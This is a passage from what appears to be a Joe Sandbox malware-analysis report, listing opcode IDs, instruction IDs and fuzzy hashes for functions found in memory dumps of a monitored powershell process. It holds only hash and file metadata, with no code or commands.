                                                                                                  • Instruction ID: 72c3f321478f07362752993a615af1f21bc32bb07d08971b48ec51e4151acae5
                                                                                                  • Opcode Fuzzy Hash: 104372752e934e11a848851085ffa6396376b070de5fb92f2e435a72be7fca4c
                                                                                                  • Instruction Fuzzy Hash: 6311CA70A043455FDB46DBB8D4507EEBFF8EF8A300F0401ABD944EB242D6749945CBA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 29e864c8d5ee8b6b29a7170a18244bca091534ea14ad0d8dd1958285f0549f12
                                                                                                  • Instruction ID: 86826ded815358b8c1b99caddf2610b61aa1c4f1c529b08a4b3294da5d2855e5
                                                                                                  • Opcode Fuzzy Hash: 29e864c8d5ee8b6b29a7170a18244bca091534ea14ad0d8dd1958285f0549f12
                                                                                                  • Instruction Fuzzy Hash: 3C115B70E00209AFDB44EFA8C8107AE77B6FF85301F1085B9D105AB291EA745A058B91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7edc50f6165fc547f00fad51fc439404fb5075f5f62bbd4e7359ed7d7412df8b
                                                                                                  • Instruction ID: 6933ea8139857db5431cc95f4d1366aafbb92fb52dcbe96cf3070523d6060b0b
                                                                                                  • Opcode Fuzzy Hash: 7edc50f6165fc547f00fad51fc439404fb5075f5f62bbd4e7359ed7d7412df8b
                                                                                                  • Instruction Fuzzy Hash: EA1102303047908FD352DB28D804A49BBB2AF46321F0981EEE146CF2A3CB64AC49C761
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 888b238e56403056039d11295ba02291cf307e26cbc38da8d8eb469b77b1848b
                                                                                                  • Instruction ID: be146ae27472ab1758d73e59aae927fbbaad0702415d6a5b11fef86cf33087af
                                                                                                  • Opcode Fuzzy Hash: 888b238e56403056039d11295ba02291cf307e26cbc38da8d8eb469b77b1848b
                                                                                                  • Instruction Fuzzy Hash: E6018F31700605AFD710EA59E840F5BB7EAEBC8721F10C139E519CB784DB70EC068BA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: edc608ee0550582fffe0aac189d0eefc3de937c4494aac162a77867867b78011
                                                                                                  • Instruction ID: df4ecb05630c4d66da41f99f65d7cff72ec3f49e8f4bd331532ab4ba719537c0
                                                                                                  • Opcode Fuzzy Hash: edc608ee0550582fffe0aac189d0eefc3de937c4494aac162a77867867b78011
                                                                                                  • Instruction Fuzzy Hash: 1F01C5B53116158FC718CF29D598D1677B5FF89616311466DE40ACBB71CB70EC41CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f85c54eba65cf6797cc6d166dc4a863052d57bd32dedb6301351179ed3752fd
                                                                                                  • Instruction ID: c7ff8ef1e9089d4618ff7dda78edc3984e0c0ff4a3c22928026b7ec0c6ca6c5b
                                                                                                  • Opcode Fuzzy Hash: 9f85c54eba65cf6797cc6d166dc4a863052d57bd32dedb6301351179ed3752fd
                                                                                                  • Instruction Fuzzy Hash: 8001A2326127209FD3209669DA40AABBBE9EFC4351F48C56EE8448B741DBB4EC0587A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f7e78b55988c5372ba5b7ac8b2924e2c219087ab4321051427b3a3af1214da1
                                                                                                  • Instruction ID: ae0e1ec88959b23102829886519e2409c0fd189e5f0312d47548514f58255b4e
                                                                                                  • Opcode Fuzzy Hash: 5f7e78b55988c5372ba5b7ac8b2924e2c219087ab4321051427b3a3af1214da1
                                                                                                  • Instruction Fuzzy Hash: A7115775614249CFCF06EF64C8949DEBBB2BF49304F150498D441BF361CA76AD05CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811638753.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_80d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e8c27c2034ebb5657cba6200cbb9806cac66f9a170c4c0d783758647a0d08284
                                                                                                  • Instruction ID: ec1fdba6311cf53bb30020bd1c72d2c78c3661bc26e9b8f5e59dafb8354dade7
                                                                                                  • Opcode Fuzzy Hash: e8c27c2034ebb5657cba6200cbb9806cac66f9a170c4c0d783758647a0d08284
                                                                                                  • Instruction Fuzzy Hash: 5001F231504B049BE7608F62CD80B67BBDCEF41329F28C01AEC4C8B2C2C2799841CAB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7771a35e034f836e760683a534b5bd924f5750ce3e40dcf714dbc0c17759ce20
                                                                                                  • Instruction ID: 551ef085baed79858342222fdf7db0189fde49ad00a4a5089b60fbbd8e941e37
                                                                                                  • Opcode Fuzzy Hash: 7771a35e034f836e760683a534b5bd924f5750ce3e40dcf714dbc0c17759ce20
                                                                                                  • Instruction Fuzzy Hash: 6601D470A002546BDB209B599C01BBF7B659B81B10F14407AF504AB2C1CBB05915C7A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fe4c38eddfad25c107bdbae3440016c9a30acd698acb94e11a30abbca8a63f63
                                                                                                  • Instruction ID: 93c29c4de53fc898c308d62ccddca92bf1c1e6333c5eb5576942c6ab046a518e
                                                                                                  • Opcode Fuzzy Hash: fe4c38eddfad25c107bdbae3440016c9a30acd698acb94e11a30abbca8a63f63
                                                                                                  • Instruction Fuzzy Hash: 150126392192A15FC71187B8C4256F93FE9AF462C2F0800F9D48CCF392DA34D956C7A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 583da60a6441005cc4feb7cf9624644390ca8362da9ba9a81e0eb173050f71e7
                                                                                                  • Instruction ID: 80cb85e49ba1e3026b7384d07576bb77e2248908e694bedf3d4f7e15e4d574ad
                                                                                                  • Opcode Fuzzy Hash: 583da60a6441005cc4feb7cf9624644390ca8362da9ba9a81e0eb173050f71e7
                                                                                                  • Instruction Fuzzy Hash: FC012D31A14115DFEF149FA8DD28A9E7BF1BF89201F0549ADD842AB6B1CB749840CFA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0564deaa8c68c4d1597f7a7c1bfe5bd87ab7e885e1fd6dbfbe530855f4419d8a
                                                                                                  • Instruction ID: 2e63f9e90de60371a12f368f1ebb1cf20b66a6bf3122bb419ef05ef6d90d80bd
                                                                                                  • Opcode Fuzzy Hash: 0564deaa8c68c4d1597f7a7c1bfe5bd87ab7e885e1fd6dbfbe530855f4419d8a
                                                                                                  • Instruction Fuzzy Hash: 8001BC30200B059FE764DF1AC84469AF3E5FF88355F00862DD40983790DBB0A805CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5e70f60d64eceb014b48294016eb0e930d0281feecd3f82faf67f01b612316c2
                                                                                                  • Instruction ID: 9967b8433f8606eff7356ef7d2e70b502eea271875a894af9dce96a6aa513a47
                                                                                                  • Opcode Fuzzy Hash: 5e70f60d64eceb014b48294016eb0e930d0281feecd3f82faf67f01b612316c2
                                                                                                  • Instruction Fuzzy Hash: 52011A32D1161A9BCF04DFA4E8005DEF7B6EFCA711F514616E51137160EBB0254A8BA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bdc3b9ff882acb1da1980f28743b7aac2cf679480ea8382e0ff2eba7a673aaff
                                                                                                  • Instruction ID: 487e4a57f2af6218a13cf1a622fdd1557d915f1a29d98b0ec55342619048ef52
                                                                                                  • Opcode Fuzzy Hash: bdc3b9ff882acb1da1980f28743b7aac2cf679480ea8382e0ff2eba7a673aaff
                                                                                                  • Instruction Fuzzy Hash: 70113274A00104CFCB48EF68D598A6EBBF2AF88301F258569E406E73A1DB74ED02CB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ba1e78f1e5d116849caa91201c9f649bc8c6f159e3b1770601fb918f4b41b972
                                                                                                  • Instruction ID: 8db2699c21d458112d9e395d117fce0b228253b010e2544133ecdf2b47a20227
                                                                                                  • Opcode Fuzzy Hash: ba1e78f1e5d116849caa91201c9f649bc8c6f159e3b1770601fb918f4b41b972
                                                                                                  • Instruction Fuzzy Hash: 6101D6762042905FC715CF6DCC90CAFBFF9EF89220308816AE498CB312CA309C01CB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c2e79ab8178a1cecda04f180566c95d2aa33dea5d8e3f864a224d3eb51478258
                                                                                                  • Instruction ID: a47c2b395fc7c0273204b3d4ad3c8a3d2c7c205b95a4e1ac672839401e102db8
                                                                                                  • Opcode Fuzzy Hash: c2e79ab8178a1cecda04f180566c95d2aa33dea5d8e3f864a224d3eb51478258
                                                                                                  • Instruction Fuzzy Hash: 8E01A2712007845FC710EB69D81495EBB9AFFC9360700862DF156CB2D1DBB5A90587A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e37d900765fb9051af2eab1661e981f035c3f114157766b1fab6b7281d604453
                                                                                                  • Instruction ID: e17991d80d417afd07d0b5ddbe51c003d295e988ab5e91dea9c7bc8e3b1eb270
                                                                                                  • Opcode Fuzzy Hash: e37d900765fb9051af2eab1661e981f035c3f114157766b1fab6b7281d604453
                                                                                                  • Instruction Fuzzy Hash: 4E01D131300204BFDB15AB98DC11BDA3BA7FB89710F504029F6059F291CAB2A819A7A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 17bf32f82510818014cb3f8d3c477419a8e12601082513e7020ebccab7c00275
                                                                                                  • Instruction ID: a77daa505bfa9a73775393af6c63d205e21b3eecc39835000b9ef2e35fc0c42a
                                                                                                  • Opcode Fuzzy Hash: 17bf32f82510818014cb3f8d3c477419a8e12601082513e7020ebccab7c00275
                                                                                                  • Instruction Fuzzy Hash: 8601B130A043B99BEB15DB58C5157EFBAF65B88706F04006DC041776C5CBB9590487E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9314f2e4c0b7320124b459f0f633ccbfdc71ab25c717e58ad4d67ab0da1a3285
                                                                                                  • Instruction ID: d0728f12589d7faa1593cdb6020f169187d654379df7a1557dc548577d7cba81
                                                                                                  • Opcode Fuzzy Hash: 9314f2e4c0b7320124b459f0f633ccbfdc71ab25c717e58ad4d67ab0da1a3285
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ea4d101c7576cd08528fe180ed79e8ebcb5aacba92370dbc83be70bf90fce261
                                                                                                  • Instruction ID: ad1bae37fe21cdf4bd12b68051f7cef5bb5a1c9a2ace479d88a10481cfed9071
                                                                                                  • Opcode Fuzzy Hash: ea4d101c7576cd08528fe180ed79e8ebcb5aacba92370dbc83be70bf90fce261
                                                                                                  • Instruction Fuzzy Hash: DBF0E2312167925BE323877D88206FE7BA99FC636170541AAD489CF202EB24D84A9B91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2212330a9aefb9eaf4cad03b2ded08b51c1cd2d50c3cf964e91685da11bb5686
                                                                                                  • Instruction ID: 592fa464b6dc37b2e75b1919060c33f78be3e988eeceddf6c107aeb2ad3deec0
                                                                                                  • Opcode Fuzzy Hash: 2212330a9aefb9eaf4cad03b2ded08b51c1cd2d50c3cf964e91685da11bb5686
                                                                                                  • Instruction Fuzzy Hash: 11F0E4773091946FC316016D6C145F67F6DD787131F0840A7F654CB243C5144C0597F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e27b155f06e817da0753392e2d0ee00860f957859349cf1f5224e2b93bf5f3d8
                                                                                                  • Instruction ID: 5caad4455216ccbf0d32b5946b84c0fc08900a29f78b4c236cdfa0939fa4857e
                                                                                                  • Opcode Fuzzy Hash: e27b155f06e817da0753392e2d0ee00860f957859349cf1f5224e2b93bf5f3d8
                                                                                                  • Instruction Fuzzy Hash: A601AD30114B21CFC329CB25E440A12B7F3FF85206B14886DD5864BA52CBB6F845CF80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fd3e525f4aa66aa918c06969d0ab284410e54c9882bebf6ae4668e41528ce1c4
                                                                                                  • Instruction ID: 6445aee3899c456ebc6fa4800a64c6cc27bc23350a18399cb84cbe760243865e
                                                                                                  • Opcode Fuzzy Hash: fd3e525f4aa66aa918c06969d0ab284410e54c9882bebf6ae4668e41528ce1c4
                                                                                                  • Instruction Fuzzy Hash: 42F0E232E0524A8FCF619FA8D8419EE7FF2EF89221B10456BE004E3262C3314D51CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6aaa990c9413a87e3e773fa7352c5109bdd7d462adb2bd06d82f5173beaea3af
                                                                                                  • Instruction ID: 2e7983b0ec6a2c85f9cee0cb9bac9f3ef5757931906435a5b35fefe3f4f2d5c2
                                                                                                  • Opcode Fuzzy Hash: 6aaa990c9413a87e3e773fa7352c5109bdd7d462adb2bd06d82f5173beaea3af
                                                                                                  • Instruction Fuzzy Hash: E2F084F2B082845FE71187689C21BFA7F60DB92311F4840DBE042CB5D2CB248221C322
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cb6785fb924dfbc28e5a20f0d0780bcbd6337bc47daee27c8f6f85f6051be4dc
                                                                                                  • Instruction ID: 23e0fa76c5f4dff8cd3da045485875f389bad1ed9a0e2a44aa043fbf5b4d9e49
                                                                                                  • Opcode Fuzzy Hash: cb6785fb924dfbc28e5a20f0d0780bcbd6337bc47daee27c8f6f85f6051be4dc
                                                                                                  • Instruction Fuzzy Hash: 83F0A773F04118ABCB158A5AF8056DE7BBDEFC4221F10C07BE415C3240DA7589058BA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 295b9b9efb64cd79953c4213ea871ec89a4168401af7ffc8019d0715f2ab649a
                                                                                                  • Instruction ID: 03323425199ba5d1a7bb4bb3fe2975b9dbb20fd01088549e5cbe8542030a05da
                                                                                                  • Opcode Fuzzy Hash: 295b9b9efb64cd79953c4213ea871ec89a4168401af7ffc8019d0715f2ab649a
                                                                                                  • Instruction Fuzzy Hash: 11F065B550A255BFD3119E55EC44CA7FFBCFA8A22030642DAE90887613C634AC85CBF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d135bf2d2d0f30bfb94a4db56bc45d9bf0ad2d06555baeb17b5166395224ff50
                                                                                                  • Instruction ID: 8b04ce980d9deac7f080b393f87a1d6781271aae53f08d7d11bf376fb38e781b
                                                                                                  • Opcode Fuzzy Hash: d135bf2d2d0f30bfb94a4db56bc45d9bf0ad2d06555baeb17b5166395224ff50
                                                                                                  • Instruction Fuzzy Hash: DDF0F0B2800685EFC311CB58D004B89BFA1FF84721F14812AE05DCB642DBB0A954C791
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c1608c03429927a2e219d35a5b25714d2b7e5656e8c26f854337d6e2f9094c2
                                                                                                  • Instruction ID: f24e28d69f8f4e2d06461f4a80b2165822afd455c43d6495c718074bcb803833
                                                                                                  • Opcode Fuzzy Hash: 5c1608c03429927a2e219d35a5b25714d2b7e5656e8c26f854337d6e2f9094c2
                                                                                                  • Instruction Fuzzy Hash: 7BE092373093404BD716566EB81022A7B9A9FC256271A007BE519C7351EE108C1B87B5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f16889104014fbdebd4623fb673cff21cc380c05dc6bccc4689f57177c1b1c61
                                                                                                  • Instruction ID: 2c2637714eb95af4203c62efdc97f80be4424c4b30754d61e955ef276c7542be
                                                                                                  • Opcode Fuzzy Hash: f16889104014fbdebd4623fb673cff21cc380c05dc6bccc4689f57177c1b1c61
                                                                                                  • Instruction Fuzzy Hash: 53F082717006009FD3149F5AE884C6EBBDAEBC4711B45C57DE10ADB3A2CB75AC414B65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bb5a73bf47dc35b0a82ba4b5536752687a731f9f4f5c8cc6a505d6e5cc7eabb
                                                                                                  • Instruction ID: edb8a4017fcaa11476293b7df1460137ba96f4a46bfbe3b887e9b2b319653417
                                                                                                  • Opcode Fuzzy Hash: 5bb5a73bf47dc35b0a82ba4b5536752687a731f9f4f5c8cc6a505d6e5cc7eabb
                                                                                                  • Instruction Fuzzy Hash: 4EE068B331D2905FD3118259BC901E6AF04DB8526072480ABE11CCB202D5128D0683E3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0c4eb36a7c2dc4319db61b27430804fa6a38a9238caac1f4375c56c8a69f07e5
                                                                                                  • Instruction ID: 64df3594f11cafe4c0b73b35f132e123e1a504b03dcc624d51e9bf4daedde542
                                                                                                  • Opcode Fuzzy Hash: 0c4eb36a7c2dc4319db61b27430804fa6a38a9238caac1f4375c56c8a69f07e5
                                                                                                  • Instruction Fuzzy Hash: 4BF05E31A00605DFCB149B66E44495AB7E5EFC8325B14C96CD46A97740DF34FC41CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bfa4798c66cd25ce3a512d58c47d419fccc77450b049601edd25ff581ca51c78
                                                                                                  • Instruction ID: 7456a306b03f92d1a9494ae6defa13be7443aa3048a6c389175c26ed5f5a4fdc
                                                                                                  • Opcode Fuzzy Hash: bfa4798c66cd25ce3a512d58c47d419fccc77450b049601edd25ff581ca51c78
                                                                                                  • Instruction Fuzzy Hash: EA01B635A11109DFDB18DB90E599BEDBBB2FB88325F146028E50267386CB716D82CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ffbcb913d01e8c4bf5a9bfbe0d3efb64df3719fc8fae7dbab0486ed7a3498c3b
                                                                                                  • Instruction ID: cbbbeaa517dd6fa9db4639c7237db3aba3c16c24bd521c7f71d258bd91d23bb8
                                                                                                  • Opcode Fuzzy Hash: ffbcb913d01e8c4bf5a9bfbe0d3efb64df3719fc8fae7dbab0486ed7a3498c3b
                                                                                                  • Instruction Fuzzy Hash: 52F0A475E00219EFCF40DFA9D9059EEBBF5FB4C250B10806AE919E7210E7355A609F90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6237c851a7a14738990a86dcfe913420d4b394a251c4a3c449e490381ec06537
                                                                                                  • Instruction ID: 4a8ea3afc31c1bf0acdfebcf454af5cf515c6530d32270624915368d2ef0df2c
                                                                                                  • Opcode Fuzzy Hash: 6237c851a7a14738990a86dcfe913420d4b394a251c4a3c449e490381ec06537
